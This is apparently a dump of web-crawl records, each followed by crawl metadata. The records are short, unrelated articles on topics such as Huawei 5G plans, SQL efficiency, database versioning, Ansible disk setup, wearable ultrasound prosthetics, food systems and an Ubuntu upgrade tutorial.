The Asian iteration of MWC is currently taking place in Shanghai and all big smartphone manufacturers are there. No actual phones are coming out of the event, but we still get some interesting technology announcements. The latest comes from Huawei, which said it’s planning to introduce 5G chips in March 2019, followed by 5G phones by the end of the following quarter. CEO Eric Xu stated that with Release 16 of the 3GPP standard, issues with low latency and massive connectivity will be resolved and the development of 5G networks and services will open up. According to Mr. Xu, 5G networks will promote mobile video streaming and other services like Augmented, Virtual and Mixed Reality. To cover demand for such networks, the company will roll out commercial solutions for NSA (non-standalone) networks in September 2018, while standalone platforms like an eventual 5G Kirin SoC will follow by March next year.
systems_science
https://sunday.fudge.org/issues/fudge-sunday-data-portability-742573
2022-05-18T03:55:01
s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662521041.0/warc/CC-MAIN-20220518021247-20220518051247-00097.warc.gz
0.932009
191
CC-MAIN-2022-21
webtext-fineweb__CC-MAIN-2022-21__0__106045452
en
What is data portability? Simply stated, data portability is the means of ensuring that data within a service is not prevented from extraction and reuse, either independently or with another service. In practice, a simple example might be unstructured data such as a photo service allowing one to download all the individual’s photos associated with that service. In effect, an individual can extract what was placed into a service. For a complex example, imagine a social photo sharing service. In this more complex example, data portability might mean access to similarly unstructured data such as the complete timeline of various photo artifacts in a raw format, social updates or comments relating to those artifacts, and related records containing the metadata for those artifacts, all in a variety of open formats (json, html, tgz, zip, or similar archives) that are structured so as to be both accessible and readily usable, whether independently with generally available software or for import into another service.
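As a purely illustrative sketch (the field names are invented and not drawn from any particular service), a portable export of one photo and its related records might look something like this in JSON:
{
  "photo_id": "12345",
  "file": "photos/12345.jpg",
  "uploaded_at": "2020-06-01T12:34:56Z",
  "caption": "Example caption",
  "comments": [
    { "author": "friend_a", "text": "Nice shot!", "posted_at": "2020-06-02T08:00:00Z" }
  ],
  "metadata": { "camera": "ExampleCam", "iso": 200 }
}
The point of the sketch is simply that the artifact, its social context, and its metadata travel together in an open, machine-readable structure that other software can import.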
systems_science
https://support.xfusion.com/server-simulators/index_en.html
2023-06-03T18:00:50
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224649302.35/warc/CC-MAIN-20230603165228-20230603195228-00446.warc.gz
0.845706
1,030
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__72260236
en
- Server iBMC Simulator (V600, V300): The iBMC is a proprietary intelligent management system that remotely manages servers. The iBMC complies with Intelligent Platform Management Interface (IPMI) standards and Simple Network Management Protocol (SNMP). It provides various functions, including keyboard, video, and mouse (KVM) redirection, text console redirection, remote virtual media, and reliable hardware monitoring and management.
- Server Purley BIOS Simulator: The Purley-based servers use a proprietary BIOS developed on the Insyde code base. The BIOS provides a variety of in-band and out-of-band configuration functions. It is scalable and can be easily customized to a variety of setups.
- Server Whitley BIOS Simulator: The Whitley-based servers use a BIOS developed on the code bases of Independent BIOS Vendors (IBVs). The BIOS provides a variety of in-band and out-of-band configuration functions. It is scalable and can be easily customized to a variety of setups.
- Server CMC Simulator (5.10): The CMC software manages all the hardware devices of the KunLun 9008, 9016, and 9032 servers.
- intelligent Rack Management (iRM): iRM is an intelligent rack management system that supports Redfish specifications. It supports asset locating and management based on U marks, sensor monitoring in the rack, and reliable monitoring and management of power supplies and batteries.
- FusionDirector: FusionDirector enables unified server hardware O&M management. Public cloud and enterprise customers can use FusionDirector to achieve simple and efficient O&M management of servers in each phase of the life cycle. FusionDirector implements visualized management and fault diagnosis for servers, and provides lifecycle management capabilities such as device management, device configuration, firmware upgrade, device monitoring, and OS deployment for servers, helping O&M personnel improve O&M efficiency and reduce O&M costs.
- Server Smart Provisioning Simulator (1.5.2): FusionServer Tools Smart Provisioning provides a graphical user interface for embedded server configuration, upgrade, and system deployment. With this demo environment, you can perform RAID configuration, firmware upgrades for hard disks, NICs, and RAID controller cards, and OS installation of Windows, RHEL, SLES, VMware ESXi, and CentOS systems.
- FusionOne DB Automatic Deployer Simulator (V3.0): FusionOne DB Automatic Deployer has an easy-to-use GUI that simplifies server deployment. It provides diverse deployment functions such as OS parameter configuration, OS automatic installation and acceptance, DB automatic deployment and acceptance, and HA automatic deployment and acceptance. Currently, it supports the following deployment scenarios: SLES and SAP HANA; openEuler and openGauss; RedHat and Oracle.
- E9000 Server HMM Simulator (V687): The E9000 server management module MM910 implements central management of the hardware devices in the chassis. Each E9000 chassis is configured with two MM910s in active/standby mode. The MM910s support active/standby switchovers and hot swap.
- FusionOne Center for vSAN (23.0.0): FusionOne Center is an intelligent management platform built by xFusion. FusionOne Center for vSAN provides hyper-converged infrastructure device management capabilities based on VMware vCenter. The aim is to simplify hyper-converged management processes. The platform combines computing, network, and storage functions to help you run hyper-converged environments with VMware vCenter more efficiently.
- FusionOne Center for vSAN Deployment (23.0.0): FusionOne Center is an intelligent management platform built by xFusion. FusionOne Center for vSAN Deployment provides the capability of creating vSAN clusters based on VMware vCenter. Users can easily initialize vSAN clusters according to the prompts of the navigation page.
- FusionOne Center for DB (1.5.0): FusionOne Center for DB is full-lifecycle intelligent O&M management software for software and hardware such as systems and DBs. It can implement real-time automatic monitoring for DBs (including HANA DBs, SAP application systems, FusionDB, and Oracle DBs) and their OSs. Once an exception occurs, it notifies the user immediately, significantly improving O&M efficiency and ensuring the reliability of services. It can also monitor alarms on hardware (such as the iBMCs and switches). It supports comprehensive inspection of the running status of device OSs and DBs to detect potential risks in a timely manner and reduce risks.
systems_science
https://impactful.co.za/resources/articles/the-importance-of-writing-efficient-sql-code/
2024-02-28T13:07:40
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474715.58/warc/CC-MAIN-20240228112121-20240228142121-00278.warc.gz
0.878619
631
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__44120359
en
Structured Query Language (SQL) is a widely used programming language for managing and querying relational databases. As databases grow in size and complexity, the efficiency of SQL code becomes crucial in maintaining optimal system performance, responsiveness, and resource utilization. This article will explore the importance of writing efficient SQL code, its benefits, and best practices for optimizing SQL queries to ensure smooth database operations and superior performance. Why Efficient SQL Code Matters - Improved Performance: Optimized SQL queries execute faster and require fewer resources, ensuring better overall database performance and minimizing response times for end-users. - Scalability: Efficient SQL code helps databases scale more effectively to accommodate increased data volumes and user loads, ensuring that performance remains consistent even as demands grow. - Reduced Resource Consumption: Optimized SQL queries consume fewer system resources, such as CPU, memory, and disk space, allowing organizations to maximize the utilization of their existing infrastructure and reduce costs. - Enhanced User Experience: Faster query execution times and reduced resource consumption translate to a better user experience, ensuring that users can access the information they need quickly and without frustration. - Easier Maintenance: Writing efficient SQL code simplifies database maintenance and troubleshooting, as optimized queries are less likely to cause bottlenecks or other performance issues. Best Practices for Writing Efficient SQL Code - Select Only Necessary Data: When writing SQL queries, only request the specific data and columns needed for your task, reducing the amount of data retrieved and processed. - Use Indexes: Leverage database indexes to speed up query execution and improve performance. Ensure that your indexes are well-maintained and updated as needed. - Optimize Joins: Use the appropriate join type for your specific use case and limit the number of joins in a single query, as excessive joins can lead to performance issues. - Use Subqueries Wisely: Subqueries can be powerful tools for breaking down complex queries but should be used judiciously, as they can impact performance if not optimized correctly. Consider using derived tables or common table expressions (CTEs) when appropriate. - Limit the Use of Functions: While functions can simplify SQL code, they can also impact performance if used excessively or inappropriately. Use functions sparingly and consider alternatives when possible. - Optimize Query Execution Plans: Analyze query execution plans to identify potential bottlenecks or inefficiencies, and make adjustments to your SQL code as needed to optimize performance. - Test and Monitor: Continuously test and monitor the performance of your SQL queries, making adjustments as needed to maintain optimal performance and resource utilization. The importance of writing efficient SQL code cannot be overstated, as it plays a critical role in ensuring optimal database performance, scalability, and resource utilization. By following best practices and regularly monitoring query performance, organizations can optimize their SQL code to deliver a superior user experience, maximize infrastructure investments, and simplify database maintenance. Ultimately, investing time and effort into writing efficient SQL code will pay dividends in the long run, enabling organizations to fully leverage the power of their databases and drive business success.
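To make the advice about selecting only necessary data and using indexes concrete, here is a small illustrative sketch (the table and column names are invented for the example):
-- Inefficient: returns every column of every row, forcing a full scan
SELECT * FROM orders;
-- More efficient: request only the needed columns and rows,
-- and support the filter with an index
CREATE INDEX idx_orders_customer_date ON orders (customer_id, order_date);
SELECT order_id, order_date, total_amount
FROM orders
WHERE customer_id = 42
  AND order_date >= '2024-01-01';
With the index in place, the database can locate the matching rows directly instead of scanning the entire table, which is exactly the kind of saving the guidelines above are aiming for.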
systems_science
https://zitec.com/blog/database-versioning/
2022-01-22T09:03:34
s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303779.65/warc/CC-MAIN-20220122073422-20220122103422-00039.warc.gz
0.919194
1,063
CC-MAIN-2022-05
webtext-fineweb__CC-MAIN-2022-05__0__220787406
en
While using a code versioning process and pushing the code to the production environment without FTP-ing it is a first step in getting things right, the immediate thing that you will probably think of is how to version the database too. This is what we did. We wanted it to be part of the deployment process and also integrated with the development environments. Before jumping in to develop an in-house tool, I did some (Google) research. What I found was a few proprietary solutions available for MS SQL Server, but I haven't seen any functional tool/solution/script for the open source counterparts like MySQL or PostgreSQL.
Some terms first
Like with every process, we need some terms when referring to different parts or actions of this process. So, here they are:
- baseline – represents the database schema including database objects like triggers, views, etc.; the file is named "xx.yy.zz.sql"
- change script – represents a file that contains one or more SQL commands; the file is named "xx.yy.zz.sql"
- test data – represents minimal test data that should work with the latest baseline and change scripts available; the file is named "data.sql"
- z_db_versioning – represents the table that will be created in each versioned database and will hold the current version of the database
Notes about revisions:
- xx – represents the major number of the database
- yy – the minor
- zz – the revision point
Each project should accommodate, in its repository, the DB versioning directory structure. Each of these files is stored on SVN (or another source control system), just like the usual code:
- the DB versioning related files go under the "db" directory (this name is/should be configurable per project)
- the baselines are stored under "/db/baselines/"
- the change scripts under "/db/change_scripts/"
- and the test data under "/db/test_data/"
Operations on localhost
Localhost here refers to the developer machine. Every structural change that is about to be applied to the database must be included in one or more change scripts. It is recommended that a change script contain a single SQL instruction, rather than a batch of SQL instructions. It is the developer's responsibility to commit "compatible" change scripts to SVN, in the sense that the versioning system is not concerned with whether a change script is valid or not. When a certain change script ends up with an error, the system will simply skip it, and it can never be executed again.
Operations on DEV
This is the place where most of the versioning actions take place. Every time the versioning system is executed, the following actions take place:
- the database is emptied (dropped, then re-created)
- the baseline is applied
- the change scripts are then applied
- finally, the test data is loaded
Because we can have multiple developers working on the same code base, on different development branches, and because all of them will need to test their code on the DEV machine, we can end up with some incompatible database changes from one branch to another. That is why we chose to completely drop and re-create the database in the DB versioning process. The versioning system will search for and apply all change scripts that are higher than the latest baseline available on that branch. So, it will ignore the version number found in the z_db_versioning table. In fact, this is the only environment where z_db_versioning is ignored.
Operations on STG
Here only the change scripts with a version number higher than the DB version are executed.
A change script can be applied only once, no matter whether it executed successfully or ended up with a SQL error. While it is very unlikely to have change scripts running into errors, they are not applied again because they might be incompatible with the rest of the change scripts that were executed in the same batch. Another key aspect of the STG server is that we use it to generate the baselines whenever the developer/DBA thinks it is necessary. It is good practice to always keep your database data in sync with the PROD environment to be able to see how the application behaves with the real data set.
Operations on PROD
Exactly like with the STG environment, only the change scripts with a version number higher than the DB version are executed. Like above, a change script can be applied only once.
What it is not
Before closing this up, there are some things to mention about what the DB versioning system is not, or what it cannot do:
- it is not a database backup
- it does not version data, but only the database schema and objects (triggers, views, rules, etc.)
- it cannot revert to a previous DB version; it is incremental only
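As an illustrative sketch of how the pieces could fit together (only the z_db_versioning table name comes from the article; the column layout and the example change script are assumptions), the version-tracking table and a change script might look like this:
-- z_db_versioning holds the version currently applied to this database
CREATE TABLE z_db_versioning (
    major      INT NOT NULL,
    minor      INT NOT NULL,
    revision   INT NOT NULL,
    applied_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP
);
-- change script 01.02.05.sql: a single structural change, as recommended above
ALTER TABLE customers ADD COLUMN loyalty_points INT NOT NULL DEFAULT 0;
On STG and PROD, the tool would compare the script's 01.02.05 number against the version recorded in z_db_versioning and apply the script only if it is newer, then update the recorded version.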
systems_science
https://strangeadventures.in/2021/06/17/creating-logical-volumes-with-ansible
2024-04-16T19:17:59
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817106.73/warc/CC-MAIN-20240416191221-20240416221221-00758.warc.gz
0.809044
395
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__76185219
en
Ansible is often overlooked for managing the more physical aspects of the devices it is used to configure, but it has some powerful tools for handling lower level duties, such as disks. Recently I was working on some old-fashioned VMWare virtual machines and discovered that a lot of the guidance for managing logical volumes in Ansible is dated, so here are my modernized notes on taking a disk from device to volume. This is NOT a primer on LVM itself; an understanding of LVM is recommended before trying to implement these steps.
Create a new logical volume group (docs)
- name: Create a volume group on top of /dev/sdb with physical extent size = 32MB
  community.general.lvg:
    vg: vg.storage
    pvs: /dev/sdb1
    pesize: 32
Create a logical volume in your logical volume group (docs)
- name: create logical volume
  community.general.lvol:
    vg: vg.storage
    lv: data
    size: 10g
Create a filesystem on your new volume (docs)
- name: Create a ext4 filesystem on the data volume
  community.general.filesystem:
    fstype: ext4
    dev: /dev/vg.storage/data
Create a folder to mount our new volume to (docs)
- name: Create directory /data if does not exist
  ansible.builtin.file:
    path: /data
    state: directory
    mode: '0755'
Mount our new volume to /data (docs)
- name: mount the logical volume to /data
  ansible.posix.mount:
    path: /data
    src: /dev/vg.storage/data
    fstype: ext4
    state: mounted
These instructions were tested on Ubuntu 20.04 servers with Ansible 2.11 but should work on any Linux flavor that supports LVM.
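If you want to run these tasks as one playbook, a minimal wrapper might look like the following (the file name, play name, and host group are placeholders; it assumes the community.general and ansible.posix collections are installed and that privilege escalation is permitted):
# create_data_volume.yml (hypothetical file name)
- name: Provision /data on an LVM logical volume
  hosts: storage_servers
  become: true
  tasks:
    # paste the lvg, lvol, filesystem, file, and mount tasks from above here
It can then be run with something like: ansible-playbook -i inventory.ini create_data_volume.yml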
systems_science
https://www.rips.ca/agri-monitoring
2023-11-28T10:08:08
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679099281.67/warc/CC-MAIN-20231128083443-20231128113443-00468.warc.gz
0.952934
165
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__130324944
en
This is an extremely reliable driveway alarm that is used to detect vehicles only. The probe is buried parallel to the driveway and will detect vehicles passing by within approximately 10-12 feet. The direct burial cable can be run to a tree or post nearby, where the transmitter box is located. When a vehicle drives by, the transmitter will send a signal to the receiver up to 2500 feet away. This is ideal in locations where there may be deer or other large animals that would cause false signals with a motion-detecting system. Also, because the probe is buried underground, it will be the least noticeable of our wireless systems. The transmitter is weatherproof and meant for exterior locations. Up to four zones can be monitored with additional transmitters. The transmitters can be programmed so they will each sound a different tone at the receiver.
systems_science
https://aiumthescan.blog/tag/mechatronic-hand/
2023-12-01T00:35:50
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100258.29/warc/CC-MAIN-20231130225634-20231201015634-00112.warc.gz
0.929483
1,053
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__176400603
en
Ultrasound technology has continued to be miniaturized at a rapid pace for the past several decades. Recently, handheld smartphone-sized ultrasound systems have emerged and are enabling point-of-care imaging in austere environments and resource-poor settings. With further miniaturization, one can imagine that wearable smartwatch-sized imaging systems may soon be possible. What new opportunities can you imagine with wearable imaging? My research group has been pondering this question for a while, and we have been working on an unexpected application: using ultrasound imaging to sense muscle activity and volitionally control robotic devices. Since antiquity, humans have been working on developing articulated prosthetic devices to replace limbs lost to injury. One of the earliest designs of an articulated mechanical prosthetic hand dates from the Second Punic War (218–201 BC). However, robust and intuitive volitional control of prosthetic hands has been a long-standing challenge that has yet to be adequately solved. Even though significant research investments have led to the development of sophisticated mechatronic hands with multiple degrees of freedom, a large proportion of amputees eventually abandon these devices, often citing limited functionality as a major factor. A major barrier to improving functionality has been the challenge of inferring the intent of the amputee user and to derive appropriate control signals. Inferring the user’s intent has primarily been limited to noninvasively sensing electrical activity of muscles in the residual limbs or more invasive sensing of electrical activity in the brain. Commercial myoelectric prosthetic hands utilize 2 skin-surface electrodes to record electrical activity from the flexor and extensor muscles of the residual stump. To select between multiple grips with just these 2 degrees of freedom, users often have to perform a sequence of non-intuitive maneuvers to select among pre-programmed grips from a menu. This rather unnatural control mechanism significantly limits the potential functionality of these devices for activities of daily living. Recently, systems with multiple electrodes that utilize pattern recognition algorithms to classify the intended grasp end-state from recorded signals have shown promise. However, the ability of amputees to translate end-state classification to intuitive real-time control with multiple degrees of freedom continues to be limited. To address these limitations, invasive strategies, such as implanted myoelectric sensors are being pursued. Another approach, known as targeted muscle reinnervation, involves surgically transferring the residual peripheral nerves from the amputated limb to different intact muscle targets that can function as a biological amplifier of the motor nerve signal. While these invasive strategies have exciting promise, there continues to be a need for better noninvasive sensing. Recently, our research group has demonstrated that ultrasound imaging can be used to resolve the activity of the various muscle compartments in the residual forearm. When amputees imagine volitionally controlling their phantom limb, the innervated residual muscles in the stump contract and this mechanical contraction can be visualized clearly on ultrasound. Indeed, one of the major strengths of ultrasound is the exquisite ability to quantify even minute tissue motion. 
Contractions of both superficial and deep-seated functional muscle compartments can be spatially resolved enabling high specificity in differentiating between different intended movements. Our research has shown that sonomyography can exceed the grasp classification accuracy of state-of-the-art pattern recognition, and crucially enables intuitive proportional position control by utilizing mechanical deformation of muscles as the control signal. In studies with transradial amputees, we have demonstrated the ability to generate robust control signals and intuitive position-based proportional control across multiple degrees of freedom with very little training, typically just a few minutes. We are now working on miniaturizing this technology to a low-power wearable system with compact electronics that can be incorporated into a prosthetic socket and developing prototype systems that can be tested in clinical trials. The feedback we have received so far from our amputee subjects and clinicians indicates that this ultrasound technology can overcome many of the current challenges in the field, and potentially improve functionality and quality of life of amputee users. Now, if only noninvasive ultrasound neuromodulation can be used to provide haptic and sensory feedback to amputee users in a closed loop ultrasound-based sensing and stimulation system, we will be a step closer to restoring sensorimotor functionality to amputee users, and a grand challenge in the field of neuroprosthetics may be within reach. That will, of course, require some more research. I was attracted to ultrasound research as a graduate student because of the nearly limitless possibilities of ultrasound technology beyond traditional imaging applications. As wearable sensors revolutionize healthcare, perhaps wearable ultrasound may have a role to play. One can only imagine what other novel applications may be enabled as the technology continues to be miniaturized. I think it is an exciting time to be an ultrasound researcher. What new opportunities can you imagine with wearable imaging? Are you working on something using miniaturized ultrasound? Comment below or let us know on Twitter: @AIUM_Ultrasound. Siddhartha Sikdar, PhD, is a Professor in the Bioengineering Department in the Volgenau School of Engineering at George Mason University.
systems_science
https://gsak.net/help/hs47005.htm
2022-01-29T06:58:34
s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320300573.3/warc/CC-MAIN-20220129062503-20220129092503-00614.warc.gz
0.763981
143
CC-MAIN-2022-05
webtext-fineweb__CC-MAIN-2022-05__0__5348033
en
GSAK (Geocaching Swiss Army Knife)
Force elevation refresh (Right mouse click)
Select this option to force the elevation to be refreshed for this waypoint. Even if the elevation is in the local database, GSAK will check the external servers for a more current elevation and use that instead of the local value. As this process can be slow and place demands on the external servers, you can only do one waypoint at a time. This is the only way to refresh the elevation from the external server. Also see the option "Database=>update elevation".
Copyright 2004-2019 CWE Computer Services
systems_science
https://www.uppsalahealthsummit.se/news/News-detail/?tarContentId=1022574
2024-04-21T10:45:53
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817765.59/warc/CC-MAIN-20240421101951-20240421131951-00197.warc.gz
0.940949
1,363
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__165366232
en
Interview with Assem Abu Hatab – the role of smallholder farming systems to end hunger and achieve the SDGs In this interview, we meet Assem Abu Hatab, associate professor at the Department of Economics of SLU and senior development economist at the Nordic Africa Institute (NAI). Assem coordinates the workshop Zero Hunger: Is Smallholder Farming the Solution, one of the workshops presented at the upcoming summit in October. In total, they are six associate professors representing four Swedish research organisations who have been planning and organising the workshop. Erika Chenais and Ylva Persson are affiliated with the National Veterinary Institute (SVA). Klara Fischer is affiliated with the Swedish University of Agricultural Sciences (SLU). Johanna Lindahl is affiliated with SLU, SVA and Uppsala University (UU). Jonas Johansson Wensman is affiliated with SVA and SLU. Smallholder farming is critical to recognise when talking about food system transformations. One can tackle these issues from several angles, e.g. from a political and/or economic perspective, concerning livestock and local versus global markets. What made you choose to design a workshop on this topic? Assem: The idea behind the topic of our workshop originated from our research interests in smallholder farming systems in various settings and contexts. Each of us works on this topic differently: some are interested in small-scale livestock production systems, whereas others are interested in small-scale crop production systems. Some focus on smallholder farming systems in the context of Sweden, Europe and other high-income countries, whilst others focus on these systems in low- and middle-income countries’ contexts. A group of us researches the production and supply-side of the smallholder farming value chain. In contrast, others concentrate more on the demand and consumption stages of the chain. Moreover, we represent a range of research subjects, including social sciences such as economics and rural development, veterinary sciences and agricultural sciences. Thus, I think we complement each other very nicely in terms of our research interests and areas of expertise, which enabled us to work jointly to structure the workshop in an interdisciplinary way that would hopefully attract researchers, policymakers, and international organisations working with agriculture and food systems to participate in our workshop and discuss how we could unlock the potential of smallholder farming systems to contribute more effectively to end hunger and achieve the sustainable development goals. In your opinion, what are the leading public health concerns about food systems, and what needs to be done to achieve sustainable, equitable food systems promoting our health? Well, food systems are inextricably linked to health outcomes. In other words, what we eat (our diets) is one of the most significant drivers of our health and well-being. Decisions about what and how food is produced, processed, packaged, and promoted undermine the quality of what we eat. The outcomes of today's food systems lead to the triple burden of malnutrition, which refers to the coexistence of overnutrition, undernutrition and micronutrient deficiencies. In many low- and middle-income countries, the most nutritious food is often expensive, putting it out of reach for many households. At the same time, unhealthy alternatives are readily available and heavily marketed. 
Climate change, disease outbreaks and pandemics, conflicts, and other socioeconomic and environmental challenges increase food systems’ fragility. As a result, millions of people around the globe do not have safe and regular access to nutritious food to the extent that famine – which should be consigned to history – looms again. Sadly, two-thirds of children between the ages of 6 months and two years are not getting the diverse diets they need to grow up well, putting them at risk of malnutrition. Food systems are one of the primary drivers of this. Therefore, governments and their development partners and donors need to be more serious about agricultural transformation and set the reform of the sector and agriculture transformation as a top priority. Greater efforts are required to build the productive capacities of food systems, enhance their resilience and preparedness to deal with future shocks, and foster food security and nutrition for the growing populations. To accomplish this, accelerated investment in sustainable agriculture also needs to be leveraged to deliver on a longer-term goal of a more inclusive, environmentally sustainable and resilient food system. What are your expectations for Uppsala Health Summit 2022 and your involvement? The summit takes place this year when many food systems worldwide are still struggling with and trying to recover from the COVID-19 pandemic, which disrupted supply chain activities during the last two years from end to end and posed profound threats to global food security. The invasion of Ukraine earlier this year is another major event that emerged as an additional shock to food systems that threatens to scramble further fragile food supply chains, exacerbate food security challenges, and subsequently derail national and global efforts aiming to achieve SDG #1 (end hunger) and SDG #2 (end poverty). Therefore, the 2022 summit presents a significant and valuable opportunity to exchange views, share ideas, present ongoing research and receive critical feedback from colleagues and stakeholders. In particular, it provides an excellent platform to bring together researchers and stakeholders from diverse disciplines and sectors who are working in areas related to health and agricultural systems and food security to discuss and define research priorities for building more sustainable food systems. Also, I expect the summit to provide a platform for participants to network with peers and gain new insights and collaborations with other researchers interested in similar research areas. Can you tell us about an ‘Aha moment’ you have had in your research? Every time I learn new things and gain an accurate and deep understanding of something is an Aha moment. In recent decades, academic research has become more interdisciplinary as researchers aim to solve significant global challenges that span many different fields. This has become even more critical as global challenges such as the COVID-19 pandemic affected daily operations worldwide. Especially, contemporary food systems- the focus of my research- are increasingly globalised, constituting complex networks of multiple actors and multidirectional interlinkages between and organisations at local, national, regional and global levels. Besides, food systems are not isolated from other systems, such as the health systems. 
These characteristics of contemporary food systems have increased the need for system thinking and more multi- and inter-disciplinary approaches, learning from a wide range of disciplines and the inclusion of knowledge from outside of academia. When different perspectives are brought together in a way that consistently results in a greater understanding that goes beyond divisions, one has a unique chance to restructure own assumptions, gain new insights and be more capable of interpreting information and results, and then the aha moment(s) come!
systems_science
https://adaptiveagriculture.ca/news/poking-a-hole-in-a-lack-of-grain-bin-information-western-producer/
2024-04-13T07:03:11
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816586.79/warc/CC-MAIN-20240413051941-20240413081941-00415.warc.gz
0.956633
199
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__148572057
en
“There’s a sensor that we put between the fan in the bin and that air plenum, and it measures temperature, humidity, and static pressure,” Rogoschewsky said. “The control system controls the heater and connects to a cellphone tower so you can see how that system is working on your phone, with alerts. It also connects to in-bin grain temperature or temperature moisture cables and you can see those readings on your phone as well.” The web application the company developed shows how well the grain is drying down. “They can see their current bin or if they’ve got multiple devices set up or multiple bins set up they can see each bin and the inventory that’s in it, as well as the ongoing temperature, blended air humidity going in the bin. There are also graphs that show how well that fan is drying with or without supplemental heat,” Rogoschewsky said.
systems_science
http://www.ubihealthsciencesresearch.pt/page/bioinformatics-and-biosensors
2020-08-10T10:54:39
s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439738674.42/warc/CC-MAIN-20200810102345-20200810132345-00574.warc.gz
0.90026
133
CC-MAIN-2020-34
webtext-fineweb__CC-MAIN-2020-34__0__182757580
en
Bioinformatics is the application of computer technology for the management of biological information. Biological and genetic information can be gathered, stored, analyzed and integrated by computers for further gene-based drug discovery and development. This scientific field is essential for understanding human diseases and identifying new molecular targets for drug discovery by using genomic information. Biosensors are analytical devices which can be used for the detection of an analyte by combining a biological component with a physicochemical detector. Generally, the main purpose of a biosensor is to quickly test a sample for the presence of a target analyte. Biomolecules are generally used as the recognition component for the biosensor.
systems_science
https://aneel.dev/
2023-10-05T03:50:09
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233511717.69/warc/CC-MAIN-20231005012006-20231005042006-00729.warc.gz
0.964572
452
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__78711703
en
Hi, I'm Aneel. I'm a software developer. I've worked on a wide variety of projects, ranging from low level code on obscure graphics processors to large scale data processing across clusters of machines. I've made forays into database access, web development, online games, mobile apps, and devops tooling. I'm comfortable writing code that you hold in your hand and code that runs in the cloud in datacenters around the world. For the last few years, I've been working with a Security team, designing and building features that help keep our customers' data safe. Whether it's Audit Logging for our on-prem customers or Role Based Access Control for our fully-managed cloud offering, I've helped plan the architecture and code it up. I excel at understanding both the business goals and engineering constraints of a project, which lets me translate between domain experts and technical specialists. I communicate in ways that respect my audience, but don't assume they share a particular jargon. Communication is key: sometimes an elegant technical solution doesn't address the right business problem, or the business goals need to be tweaked to reduce technical complexity. I can help find the sweet spots where we can deliver real value. I strive to improve the quality of the codebases I work with, making them more efficient and more comprehensible. I advocate for careful naming, thorough testing, up-to-date documentation, and code reviews. I want to make sure that code that seems obvious to the person who wrote it is also clear to someone who'll read it in the future. That someone is often me. I'm frequently called in to figure out whether an old or complex piece of code does what it's supposed to, so I've learned the value of investing in maintainability. I enjoy working with a diverse, tightly-knit, collaborative team, on projects with broad impact across an organization. I like working with expert peers to design big systems, and find it rewarding to help less experienced engineers get to the core of a problem, and discover the tools that will help them solve it. I currently live in Austin, Texas and am not looking to relocate, but am open to remote work on the right team.
systems_science
https://junise.wordpress.com/2016/12/21/how-to-upgrade-ubuntu-to-the-latest-version-via-terminal/
2018-07-19T11:51:38
s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676590866.65/warc/CC-MAIN-20180719105750-20180719125750-00258.warc.gz
0.882861
357
CC-MAIN-2018-30
webtext-fineweb__CC-MAIN-2018-30__0__103911421
en
If you are running the server version of Ubuntu or choose not to use the GUI, then you can use this tutorial to upgrade your system to the latest version (or the latest LTS version). Although many systems can be upgraded in place without incident, it is often safer and more predictable to migrate to a major new release by installing the distribution from scratch, configuring services with careful testing along the way, and migrating application or user data as a separate step.
- Please back up your important data first.
- Now update your software package list.
sudo apt-get update -y
- Now upgrade your packages to the latest available versions.
sudo apt-get upgrade -y
- Now use the dist-upgrade command, which will perform upgrades involving changing dependencies, adding or removing packages as necessary. This will handle a set of upgrades which may have been held back by apt-get upgrade.
sudo apt-get dist-upgrade
- Now check whether the update-manager-core package is installed, and install it if not.
sudo apt-get install update-manager-core -y
- If you want to upgrade to the latest LTS version or the latest normal version, you have to edit the file /etc/update-manager/release-upgrades.
sudo nano /etc/update-manager/release-upgrades
If you want the LTS version, set Prompt=lts; if you wish to follow the latest normal release, set Prompt=normal. After editing, press ctrl+x and then y to save and exit the file.
- Upgrade the system to the latest version of Ubuntu (the command for this final step is sketched below). This involves downloading a lot of packages from the Internet, so be patient; the time required depends on your Internet speed.
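The tutorial stops short of giving the command for that final step. On Ubuntu, the standard tool for moving to a new release is do-release-upgrade, which is typically made available by installing update-manager-core as shown above, so the last step would normally be:
sudo do-release-upgrade
The tool honours the Prompt= setting configured in /etc/update-manager/release-upgrades and walks you through the release upgrade interactively.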
systems_science
http://www.gladstoneinstitutes.org/scientist/davalos
2015-07-29T13:30:27
s3://commoncrawl/crawl-data/CC-MAIN-2015-32/segments/1438042986444.39/warc/CC-MAIN-20150728002306-00141-ip-10-236-191-2.ec2.internal.warc.gz
0.931931
619
CC-MAIN-2015-32
webtext-fineweb__CC-MAIN-2015-32__0__127720235
en
